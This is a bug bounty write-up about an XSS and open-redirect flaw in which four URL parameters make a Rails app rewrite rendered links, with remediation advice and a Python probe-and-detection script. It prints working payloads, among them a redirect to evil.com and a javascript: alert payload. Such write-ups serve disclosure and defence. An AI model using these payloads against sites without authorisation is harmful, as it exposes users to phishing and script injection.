How I found an XSS via multiple parameters

Erick Fernando
Nov 7, 2023


Hello everyone. After receiving a generous reward on Bugcrowd for an XSS, I would like to share a finding from a bug bounty program a while back, made while using a fuzzer to look for open redirects and XSS.

I found a way to trigger open redirects and XSS by combining several URL query parameters that rewrite the links the frontend renders, possibly in Ruby on Rails applications (this is the third time I have found the same behaviour in a bug bounty program).

When the parameters "?protocol=A&host=X&subdomain=B&domain=C" are all present in the URL (all four are required, none can be left out), the application rewrites some links in the HTML to href="A://B.C", which allows both open redirect and XSS. This is consistent with the :protocol, :host, :subdomain and :domain options accepted by Rails' url_for: a view that feeds the request's query parameters into url_for (for example a pagination helper that merges the current query string into the next-page link) will honour these keys, and the presence of :host is what makes url_for emit an absolute URL instead of a relative path. The fix on the application side is to never pass raw request parameters into url_for and to allowlist the keys a link may carry, so that protocol, host, subdomain and domain can never come from the user.

For the open redirect, the payload is:

https://domain[.]com/?protocol=https&subdomain=evil&domain=com&host=X

This rewrites the links to href="https://evil.com".

For the XSS, the payload is:

https://domain[.]com?protocol=javascript&subdomain=%25A0alert(document.domain)//&domain=X&host=X

The links become:

href=javascript://%A0alert(document.domain)//.X

Two details of the payload matter here. The subdomain value is double-encoded (%25A0) so that the server's single round of URL decoding leaves %A0 in the href for the browser to decode, and the trailing // comments out the ".X" that the framework appends after the subdomain. Clicking the rewritten link executes the XSS.
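As an added example (not part of the original post and not the author's nuclei template), here is a small offline Python checker for the same probe: it builds the four-parameter URL for both the open-redirect and the XSS variant, then scans the returned HTML for href or form action values that begin with the injected A://B.C. The target hostname, the canary values and the sample responses are constructed for the demonstration; check_live() is the only function that touches the network and is not called by default.

```python
"""Offline checker for the four-parameter link manipulation described above.

The probe appends protocol/host/subdomain/domain to the target's query string
and inspects the returned HTML for href/action values starting with "A://B.C".
Canary values and sample responses are constructed for the demonstration.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit
from urllib.request import Request, urlopen

# Open-redirect probe. "host" never shows up in the rewritten link; it is only
# sent because the rewrite was observed to require all four parameters.
REDIRECT_PARAMS = {
    "protocol": "https",
    "host": "x",
    "subdomain": "canary-sub",       # constructed canary, not a real host
    "domain": "canary-dom.test",
}

# XSS probe with the same shape as the payload in the post. urlencode() turns
# the leading "%" into "%25", so one round of server-side decoding leaves "%A0".
XSS_PARAMS = {
    "protocol": "javascript",
    "host": "x",
    "subdomain": "%A0alert(document.domain)//",
    "domain": "x",
}


def build_probe_url(target, params):
    """Append the four URL-option parameters to target, keeping its own query."""
    parts = urlsplit(target)
    query = parse_qsl(parts.query, keep_blank_values=True) + list(params.items())
    return urlunsplit(parts._replace(query=urlencode(query)))


def expected_prefix(params):
    """The href prefix a vulnerable page emits for these params: A://B.C"""
    return f"{params['protocol']}://{params['subdomain']}.{params['domain']}"


class _LinkCollector(HTMLParser):
    """Collects href and form action attribute values from a response body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "action") and value is not None:
                self.links.append(value)


def find_manipulated_links(html, params):
    """Return every link in html that begins with the injected A://B.C."""
    collector = _LinkCollector()
    collector.feed(html)
    prefix = expected_prefix(params).lower()
    return [link for link in collector.links
            if link.strip().lower().startswith(prefix)]


def classify(params):
    """javascript: links are an XSS finding, anything else an open redirect."""
    return "xss" if params["protocol"].lower() == "javascript" else "open-redirect"


def check_live(target, params, timeout=10):
    """Fetch the probe URL and return the manipulated links (network call)."""
    req = Request(build_probe_url(target, params),
                  headers={"User-Agent": "multi-param-link-check"})
    with urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return find_manipulated_links(body, params)


# Constructed sample responses: a vulnerable page answering each probe, and an
# unaffected page that ignores the parameters.
VULNERABLE_REDIRECT_HTML = """<html><body>
<a href="https://canary-sub.canary-dom.test/login">Login</a>
<a href="https://canary-sub.canary-dom.test/signup">Sign up</a>
<a href="/static/help">Help</a>
<a href="https://cdn.example/app.js">CDN</a>
</body></html>"""

VULNERABLE_XSS_HTML = """<html><body>
<a href="javascript://%A0alert(document.domain)//.x/login">Login</a>
<a href="/static/help">Help</a>
</body></html>"""

SAFE_HTML = """<html><body>
<a href="/login">Login</a>
<a href="https://target.example/signup">Sign up</a>
</body></html>"""


if __name__ == "__main__":
    for params, html in ((REDIRECT_PARAMS, VULNERABLE_REDIRECT_HTML),
                         (XSS_PARAMS, VULNERABLE_XSS_HTML),
                         (REDIRECT_PARAMS, SAFE_HTML)):
        print(classify(params), build_probe_url("https://target.example/", params),
              find_manipulated_links(html, params))
```

Matching on the full A://B.C prefix rather than on any one parameter is what keeps the check quiet on pages that merely reflect a query value somewhere; a page has to have rebuilt the link from all of the supplied options for the prefix to appear.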

As mentioned above, the XSS was reported, the company accepted it as a high-severity vulnerability, and it paid $1,000 through Bugcrowd.

For those who are interested, I wrote a nuclei template to find this behaviour:

https://github.com/erickfernandox/nuclei-templates/blob/main/multiple-parameters-manipulation.yaml
